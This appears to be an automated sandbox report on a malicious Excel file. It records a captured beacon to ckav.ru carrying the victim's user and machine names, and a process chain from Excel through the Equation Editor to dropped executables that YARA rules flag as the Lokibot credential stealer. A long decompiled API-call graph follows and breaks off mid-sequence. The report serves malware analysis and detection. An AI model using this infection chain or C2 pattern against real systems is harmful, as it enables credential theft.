                        Feb 10, 2022 10:22:10.432744980 CET | 327 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:10.503607035 CET | 327 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v1xV1eUCMr1RHqWt4LM%2Fv%2BEUgUSXOzGnZmG6dttvsqUD60K11ymXFrl4lyksF6Q7oS%2BhJuNDPXKkgp1NVPUepBFUa%2B45veh4yiZTSSeqWs9tYXq72%2F%2FEXVVMkf5Q8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4457f29af917d-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Target ID:0
                        Start time:10:21:15
                        Start date:10/02/2022
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Imagebase:0x13f770000
                        File size:28253536 bytes
                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:2
                        Start time:10:21:38
                        Start date:10/02/2022
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:10:21:40
                        Start date:10/02/2022
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\Public\vbc.exe"
                        Imagebase:0x400000
                        File size:295124 bytes
                        MD5 hash:7DF1896047D9647D818080DD17563D92
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        Target ID:5
                        Start time:10:21:41
                        Start date:10/02/2022
                        Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                        Imagebase:0x8a0000
                        File size:125440 bytes
                        MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Target ID:6
                        Start time:10:21:41
                        Start date:10/02/2022
                        Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                        Imagebase:0x8a0000
                        File size:125440 bytes
                        MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                          Execution Graph

                          Execution Coverage:15.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:23.4%
                          Total number of Nodes:1238
                          Total number of Limit Nodes:24
3050 4013fe 3050->2959 3050->2972 3051->3050 3052 4013cb MulDiv SendMessageA 3051->3052 3052->3051 3053->3001 3054->3004 3055->3007 3651 402164 3652 4029e8 18 API calls 3651->3652 3653 40216a 3652->3653 3654 4029e8 18 API calls 3653->3654 3655 402173 3654->3655 3656 4029e8 18 API calls 3655->3656 3657 40217c 3656->3657 3658 405d7c 2 API calls 3657->3658 3659 402185 3658->3659 3660 402196 lstrlenA lstrlenA 3659->3660 3661 402189 3659->3661 3663 404e23 25 API calls 3660->3663 3662 404e23 25 API calls 3661->3662 3665 402191 3662->3665 3664 4021d2 SHFileOperationA 3663->3664 3664->3661 3664->3665 3666 4019e6 3667 4029e8 18 API calls 3666->3667 3668 4019ef ExpandEnvironmentStringsA 3667->3668 3669 401a03 3668->3669 3671 401a16 3668->3671 3670 401a08 lstrcmpA 3669->3670 3669->3671 3670->3671 3672 4021e6 3673 402200 3672->3673 3674 4021ed 3672->3674 3675 405aa7 18 API calls 3674->3675 3676 4021fa 3675->3676 3677 405346 MessageBoxIndirectA 3676->3677 3677->3673 3685 401c6d 3686 4029cb 18 API calls 3685->3686 3687 401c73 IsWindow 3686->3687 3688 4019d6 3687->3688 3689 4025ed 3690 4025f4 3689->3690 3691 40287d 3689->3691 3692 4025fa FindClose 3690->3692 3692->3691 3693 40266e 3694 4029e8 18 API calls 3693->3694 3696 40267c 3694->3696 3695 402692 3698 40573d 2 API calls 3695->3698 3696->3695 3697 4029e8 18 API calls 3696->3697 3697->3695 3699 402698 3698->3699 3719 40575c GetFileAttributesA CreateFileA 3699->3719 3701 4026a5 3702 4026b1 GlobalAlloc 3701->3702 3703 40274e 3701->3703 3704 402745 CloseHandle 3702->3704 3705 4026ca 3702->3705 3706 402756 DeleteFileA 3703->3706 3707 402769 3703->3707 3704->3703 3720 4031da SetFilePointer 3705->3720 3706->3707 3709 4026d0 3710 4031a8 ReadFile 3709->3710 3711 4026d9 GlobalAlloc 3710->3711 3712 4026e9 3711->3712 3713 40271d WriteFile GlobalFree 3711->3713 3715 402f01 47 API calls 3712->3715 3714 402f01 47 API calls 3713->3714 3716 402742 3714->3716 3718 4026f6 3715->3718 3716->3704 3717 402714 GlobalFree 3717->3713 3718->3717 
3719->3701 3720->3709 3721 40276f 3722 4029cb 18 API calls 3721->3722 3723 402775 3722->3723 3724 4027b0 3723->3724 3725 402799 3723->3725 3730 40264e 3723->3730 3728 4027c6 3724->3728 3729 4027ba 3724->3729 3726 4027ad 3725->3726 3727 40279e 3725->3727 3736 4059e3 wsprintfA 3726->3736 3735 405a85 lstrcpynA 3727->3735 3732 405aa7 18 API calls 3728->3732 3731 4029cb 18 API calls 3729->3731 3731->3730 3732->3730 3735->3730 3736->3730 3737 4014f0 SetForegroundWindow 3738 40287d 3737->3738 3739 404772 GetDlgItem GetDlgItem 3740 4047c6 7 API calls 3739->3740 3749 4049e3 3739->3749 3741 40486c DeleteObject 3740->3741 3742 40485f SendMessageA 3740->3742 3743 404877 3741->3743 3742->3741 3744 4048ae 3743->3744 3748 405aa7 18 API calls 3743->3748 3746 403e37 19 API calls 3744->3746 3745 404acd 3747 404b7c 3745->3747 3758 404b26 SendMessageA 3745->3758 3780 4049d6 3745->3780 3750 4048c2 3746->3750 3752 404b91 3747->3752 3753 404b85 SendMessageA 3747->3753 3754 404890 SendMessageA SendMessageA 3748->3754 3749->3745 3751 404a57 3749->3751 3792 4046f2 SendMessageA 3749->3792 3757 403e37 19 API calls 3750->3757 3751->3745 3760 404abf SendMessageA 3751->3760 3755 404bba 3752->3755 3761 404ba3 ImageList_Destroy 3752->3761 3762 404baa 3752->3762 3753->3752 3754->3743 3764 404d20 3755->3764 3777 40140b 2 API calls 3755->3777 3786 404bec 3755->3786 3763 4048d0 3757->3763 3765 404b3b SendMessageA 3758->3765 3758->3780 3759 403e9e 8 API calls 3766 404d6c 3759->3766 3760->3745 3761->3762 3762->3755 3767 404bb3 GlobalFree 3762->3767 3768 4049a4 GetWindowLongA SetWindowLongA 3763->3768 3776 40491f SendMessageA 3763->3776 3779 40499e 3763->3779 3781 40495b SendMessageA 3763->3781 3782 40496c SendMessageA 3763->3782 3770 404d32 ShowWindow GetDlgItem ShowWindow 3764->3770 3764->3780 3773 404b4e 3765->3773 3767->3755 3769 4049bd 3768->3769 3771 4049c3 ShowWindow 3769->3771 3772 4049db 3769->3772 3770->3780 3790 403e6c SendMessageA 3771->3790 3791 403e6c SendMessageA 3772->3791 3778 404b5f 
SendMessageA 3773->3778 3776->3763 3777->3786 3778->3747 3779->3768 3779->3769 3780->3759 3781->3763 3782->3763 3783 404cf6 InvalidateRect 3783->3764 3784 404d0c 3783->3784 3797 404610 3784->3797 3785 404c1a SendMessageA 3788 404c30 3785->3788 3786->3785 3786->3788 3788->3783 3789 404ca4 SendMessageA SendMessageA 3788->3789 3789->3788 3790->3780 3791->3749 3793 404751 SendMessageA 3792->3793 3794 404715 GetMessagePos ScreenToClient SendMessageA 3792->3794 3795 404749 3793->3795 3794->3795 3796 40474e 3794->3796 3795->3751 3796->3793 3798 40462a 3797->3798 3799 405aa7 18 API calls 3798->3799 3800 40465f 3799->3800 3801 405aa7 18 API calls 3800->3801 3802 40466a 3801->3802 3803 405aa7 18 API calls 3802->3803 3804 40469b lstrlenA wsprintfA SetDlgItemTextA 3803->3804 3804->3764 3805 404d73 3806 404d81 3805->3806 3807 404d98 3805->3807 3808 404d87 3806->3808 3823 404e01 3806->3823 3809 404da6 IsWindowVisible 3807->3809 3815 404dbd 3807->3815 3810 403e83 SendMessageA 3808->3810 3812 404db3 3809->3812 3809->3823 3813 404d91 3810->3813 3811 404e07 CallWindowProcA 3811->3813 3814 4046f2 5 API calls 3812->3814 3814->3815 3815->3811 3824 405a85 lstrcpynA 3815->3824 3817 404dec 3825 4059e3 wsprintfA 3817->3825 3819 404df3 3820 40140b 2 API calls 3819->3820 3821 404dfa 3820->3821 3826 405a85 lstrcpynA 3821->3826 3823->3811 3824->3817 3825->3819 3826->3823 3827 404275 3828 4042b3 3827->3828 3829 4042a6 3827->3829 3831 4042bc GetDlgItem 3828->3831 3833 40431f 3828->3833 3888 40532a GetDlgItemTextA 3829->3888 3835 4042d0 3831->3835 3832 404403 3886 40458f 3832->3886 3890 40532a GetDlgItemTextA 3832->3890 3833->3832 3841 405aa7 18 API calls 3833->3841 3833->3886 3834 4042ad 3836 405ce3 5 API calls 3834->3836 3837 4042e4 SetWindowTextA 3835->3837 3839 40560c 4 API calls 3835->3839 3836->3828 3840 403e37 19 API calls 3837->3840 3845 4042da 3839->3845 3846 404302 3840->3846 3847 404395 SHBrowseForFolderA 3841->3847 3842 40442f 3848 405659 18 API calls 3842->3848 3843 403e9e 8 API 
calls 3844 4045a3 3843->3844 3845->3837 3852 405578 3 API calls 3845->3852 3849 403e37 19 API calls 3846->3849 3847->3832 3850 4043ad CoTaskMemFree 3847->3850 3851 404435 3848->3851 3853 404310 3849->3853 3854 405578 3 API calls 3850->3854 3891 405a85 lstrcpynA 3851->3891 3852->3837 3889 403e6c SendMessageA 3853->3889 3856 4043ba 3854->3856 3859 4043f1 SetDlgItemTextA 3856->3859 3863 405aa7 18 API calls 3856->3863 3858 404318 3861 405da3 3 API calls 3858->3861 3859->3832 3860 40444c 3862 405da3 3 API calls 3860->3862 3861->3833 3869 404454 3862->3869 3864 4043d9 lstrcmpiA 3863->3864 3864->3859 3867 4043ea lstrcatA 3864->3867 3865 40448e 3892 405a85 lstrcpynA 3865->3892 3867->3859 3868 404497 3870 40560c 4 API calls 3868->3870 3869->3865 3874 4055bf 2 API calls 3869->3874 3875 4044e1 3869->3875 3871 40449d GetDiskFreeSpaceA 3870->3871 3873 4044bf MulDiv 3871->3873 3871->3875 3873->3875 3874->3869 3876 40453e 3875->3876 3878 404610 21 API calls 3875->3878 3877 404561 3876->3877 3879 40140b 2 API calls 3876->3879 3893 403e59 EnableWindow 3877->3893 3880 404530 3878->3880 3879->3877 3882 404540 SetDlgItemTextA 3880->3882 3883 404535 3880->3883 3882->3876 3885 404610 21 API calls 3883->3885 3884 40457d 3884->3886 3894 40420a 3884->3894 3885->3876 3886->3843 3888->3834 3889->3858 3890->3842 3891->3860 3892->3868 3893->3884 3895 404218 3894->3895 3896 40421d SendMessageA 3894->3896 3895->3896 3896->3886 3897 4022f5 3898 4022fb 3897->3898 3899 4029e8 18 API calls 3898->3899 3900 40230d 3899->3900 3901 4029e8 18 API calls 3900->3901 3902 402317 RegCreateKeyExA 3901->3902 3903 402341 3902->3903 3904 40264e 3902->3904 3905 402359 3903->3905 3906 4029e8 18 API calls 3903->3906 3907 402365 3905->3907 3910 4029cb 18 API calls 3905->3910 3909 402352 lstrlenA 3906->3909 3908 402380 RegSetValueExA 3907->3908 3911 402f01 47 API calls 3907->3911 3912 402396 RegCloseKey 3908->3912 3909->3905 3910->3907 3911->3908 3912->3904 3914 4027f5 3915 4029cb 18 API calls 3914->3915 3916 4027fb 
3915->3916 3917 40282c 3916->3917 3918 402809 3916->3918 3920 40264e 3916->3920 3919 405aa7 18 API calls 3917->3919 3917->3920 3918->3920 3922 4059e3 wsprintfA 3918->3922 3919->3920 3922->3920 3923 4024f8 3924 4029cb 18 API calls 3923->3924 3925 402502 3924->3925 3926 402536 ReadFile 3925->3926 3927 40257a 3925->3927 3928 40258a 3925->3928 3931 402578 3925->3931 3926->3925 3926->3931 3932 4059e3 wsprintfA 3927->3932 3930 4025a0 SetFilePointer 3928->3930 3928->3931 3930->3931 3932->3931 3933 4016fa 3934 4029e8 18 API calls 3933->3934 3935 401701 SearchPathA 3934->3935 3936 40171c 3935->3936 3937 4014fe 3938 401506 3937->3938 3940 401519 3937->3940 3939 4029cb 18 API calls 3938->3939 3939->3940 3941 403f7f 3942 4040a2 3941->3942 3943 403f95 3941->3943 3944 404111 3942->3944 3950 4041e5 3942->3950 3953 4040e6 GetDlgItem SendMessageA 3942->3953 3945 403e37 19 API calls 3943->3945 3946 40411b GetDlgItem 3944->3946 3944->3950 3947 403feb 3945->3947 3948 404131 3946->3948 3949 4041a3 3946->3949 3951 403e37 19 API calls 3947->3951 3948->3949 3956 404157 6 API calls 3948->3956 3949->3950 3957 4041b5 3949->3957 3952 403e9e 8 API calls 3950->3952 3954 403ff8 CheckDlgButton 3951->3954 3955 4041e0 3952->3955 3972 403e59 EnableWindow 3953->3972 3970 403e59 EnableWindow 3954->3970 3956->3949 3961 4041bb SendMessageA 3957->3961 3962 4041cc 3957->3962 3959 40410c 3963 40420a SendMessageA 3959->3963 3961->3962 3962->3955 3965 4041d2 SendMessageA 3962->3965 3963->3944 3964 404016 GetDlgItem 3971 403e6c SendMessageA 3964->3971 3965->3955 3967 40402c SendMessageA 3968 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3967->3968 3969 40404a GetSysColor 3967->3969 3968->3955 3969->3968 3970->3964 3971->3967 3972->3959 3973 401000 3974 401037 BeginPaint GetClientRect 3973->3974 3975 40100c DefWindowProcA 3973->3975 3977 4010f3 3974->3977 3978 401179 3975->3978 3979 401073 CreateBrushIndirect FillRect DeleteObject 3977->3979 3980 4010fc 3977->3980 3979->3977 3981 401102 
CreateFontIndirectA 3980->3981 3982 401167 EndPaint 3980->3982 3981->3982 3983 401112 6 API calls 3981->3983 3982->3978 3983->3982 3998 401b06 3999 401b13 3998->3999 4000 401b57 3998->4000 4001 4021ed 3999->4001 4007 401b2a 3999->4007 4002 401b80 GlobalAlloc 4000->4002 4003 401b5b 4000->4003 4004 405aa7 18 API calls 4001->4004 4005 405aa7 18 API calls 4002->4005 4011 401b9b 4003->4011 4019 405a85 lstrcpynA 4003->4019 4006 4021fa 4004->4006 4005->4011 4012 405346 MessageBoxIndirectA 4006->4012 4017 405a85 lstrcpynA 4007->4017 4010 401b6d GlobalFree 4010->4011 4012->4011 4013 401b39 4018 405a85 lstrcpynA 4013->4018 4015 401b48 4020 405a85 lstrcpynA 4015->4020 4017->4013 4018->4015 4019->4010 4020->4011 4021 402607 4022 40260a 4021->4022 4024 402622 4021->4024 4023 402617 FindNextFileA 4022->4023 4023->4024 4025 402661 4023->4025 4027 405a85 lstrcpynA 4025->4027 4027->4024 4035 401c8a 4036 4029cb 18 API calls 4035->4036 4037 401c91 4036->4037 4038 4029cb 18 API calls 4037->4038 4039 401c99 GetDlgItem 4038->4039 4040 4024aa 4039->4040 4041 40248e 4042 4029e8 18 API calls 4041->4042 4043 402495 4042->4043 4046 40575c GetFileAttributesA CreateFileA 4043->4046 4045 4024a1 4046->4045 4047 402012 4048 4029e8 18 API calls 4047->4048 4049 402019 4048->4049 4050 4029e8 18 API calls 4049->4050 4051 402023 4050->4051 4052 4029e8 18 API calls 4051->4052 4053 40202c 4052->4053 4054 4029e8 18 API calls 4053->4054 4055 402036 4054->4055 4056 4029e8 18 API calls 4055->4056 4058 402040 4056->4058 4057 402054 CoCreateInstance 4062 402073 4057->4062 4064 402129 4057->4064 4058->4057 4059 4029e8 18 API calls 4058->4059 4059->4057 4060 401423 25 API calls 4061 40215b 4060->4061 4063 402108 MultiByteToWideChar 4062->4063 4062->4064 4063->4064 4064->4060 4064->4061 4065 402215 4066 402223 4065->4066 4067 40221d 4065->4067 4069 4029e8 18 API calls 4066->4069 4071 402233 4066->4071 4068 4029e8 18 API calls 4067->4068 4068->4066 4069->4071 4070 402241 4072 4029e8 18 API calls 4070->4072 
4071->4070 4073 4029e8 18 API calls 4071->4073 4074 40224a WritePrivateProfileStringA 4072->4074 4073->4070 4075 401595 4076 4029e8 18 API calls 4075->4076 4077 40159c SetFileAttributesA 4076->4077 4078 4015ae 4077->4078 4079 401d95 4080 4029cb 18 API calls 4079->4080 4081 401d9b 4080->4081 4082 4029cb 18 API calls 4081->4082 4083 401da4 4082->4083 4084 401db6 EnableWindow 4083->4084 4085 401dab ShowWindow 4083->4085 4086 40287d 4084->4086 4085->4086 4087 401e95 4088 4029e8 18 API calls 4087->4088 4089 401e9c 4088->4089 4090 405d7c 2 API calls 4089->4090 4091 401ea2 4090->4091 4093 401eb4 4091->4093 4094 4059e3 wsprintfA 4091->4094 4094->4093 4095 401696 4096 4029e8 18 API calls 4095->4096 4097 40169c GetFullPathNameA 4096->4097 4098 4016b3 4097->4098 4104 4016d4 4097->4104 4100 405d7c 2 API calls 4098->4100 4098->4104 4099 4016e8 GetShortPathNameA 4101 40287d 4099->4101 4102 4016c4 4100->4102 4102->4104 4105 405a85 lstrcpynA 4102->4105 4104->4099 4104->4101 4105->4104 4113 402419 4123 402af2 4113->4123 4115 402423 4116 4029cb 18 API calls 4115->4116 4117 40242c 4116->4117 4118 402443 RegEnumKeyA 4117->4118 4119 40244f RegEnumValueA 4117->4119 4120 40264e 4117->4120 4121 402468 RegCloseKey 4118->4121 4119->4120 4119->4121 4121->4120 4124 4029e8 18 API calls 4123->4124 4125 402b0b 4124->4125 4126 402b19 RegOpenKeyExA 4125->4126 4126->4115 4127 402299 4128 4022c9 4127->4128 4129 40229e 4127->4129 4131 4029e8 18 API calls 4128->4131 4130 402af2 19 API calls 4129->4130 4133 4022a5 4130->4133 4132 4022d0 4131->4132 4138 402a28 RegOpenKeyExA 4132->4138 4134 4029e8 18 API calls 4133->4134 4137 4022e6 4133->4137 4136 4022b6 RegDeleteValueA RegCloseKey 4134->4136 4136->4137 4142 402a53 4138->4142 4146 402a9f 4138->4146 4139 402a79 RegEnumKeyA 4140 402a8b RegCloseKey 4139->4140 4139->4142 4143 405da3 3 API calls 4140->4143 4141 402ab0 RegCloseKey 4141->4146 4142->4139 4142->4140 4142->4141 4144 402a28 3 API calls 4142->4144 4145 402a9b 4143->4145 4144->4142 4145->4146 4147 
402acb RegDeleteKeyA 4145->4147 4146->4137 4147->4146 3474 401e1b 3475 4029e8 18 API calls 3474->3475 3476 401e21 3475->3476 3477 404e23 25 API calls 3476->3477 3478 401e2b 3477->3478 3479 4052e5 2 API calls 3478->3479 3480 401e31 3479->3480 3481 401e87 CloseHandle 3480->3481 3482 40264e 3480->3482 3483 401e50 WaitForSingleObject 3480->3483 3485 405ddc 2 API calls 3480->3485 3481->3482 3483->3480 3484 401e5e GetExitCodeProcess 3483->3484 3486 401e70 3484->3486 3487 401e7b 3484->3487 3485->3483 3490 4059e3 wsprintfA 3486->3490 3487->3481 3489 401e79 3487->3489 3489->3481 3490->3489 4148 401d1b GetDC GetDeviceCaps 4149 4029cb 18 API calls 4148->4149 4150 401d37 MulDiv 4149->4150 4151 4029cb 18 API calls 4150->4151 4152 401d4c 4151->4152 4153 405aa7 18 API calls 4152->4153 4154 401d85 CreateFontIndirectA 4153->4154 4155 4024aa 4154->4155 2855 401721 2861 4029e8 2855->2861 2859 40172f 2860 40578b 2 API calls 2859->2860 2860->2859 2862 4029f4 2861->2862 2871 405aa7 2862->2871 2865 401728 2867 40578b 2865->2867 2868 405796 GetTickCount GetTempFileNameA 2867->2868 2869 4057c2 2868->2869 2870 4057c6 2868->2870 2869->2868 2869->2870 2870->2859 2877 405ab4 2871->2877 2872 405cca 2873 402a15 2872->2873 2906 405a85 lstrcpynA 2872->2906 2873->2865 2890 405ce3 2873->2890 2875 405b48 GetVersion 2889 405b55 2875->2889 2876 405ca1 lstrlenA 2876->2877 2877->2872 2877->2875 2877->2876 2878 405aa7 10 API calls 2877->2878 2884 405ce3 5 API calls 2877->2884 2904 4059e3 wsprintfA 2877->2904 2905 405a85 lstrcpynA 2877->2905 2878->2876 2882 405bc0 GetSystemDirectoryA 2882->2889 2883 405bd3 GetWindowsDirectoryA 2883->2889 2884->2877 2885 405aa7 10 API calls 2885->2889 2886 405c4a lstrcatA 2886->2877 2887 405c07 SHGetSpecialFolderLocation 2888 405c1f SHGetPathFromIDListA CoTaskMemFree 2887->2888 2887->2889 2888->2889 2889->2877 2889->2882 2889->2883 2889->2885 2889->2886 2889->2887 2899 40596c RegOpenKeyExA 2889->2899 2896 405cef 2890->2896 2891 405d57 2892 405d5b CharPrevA 2891->2892 2894 
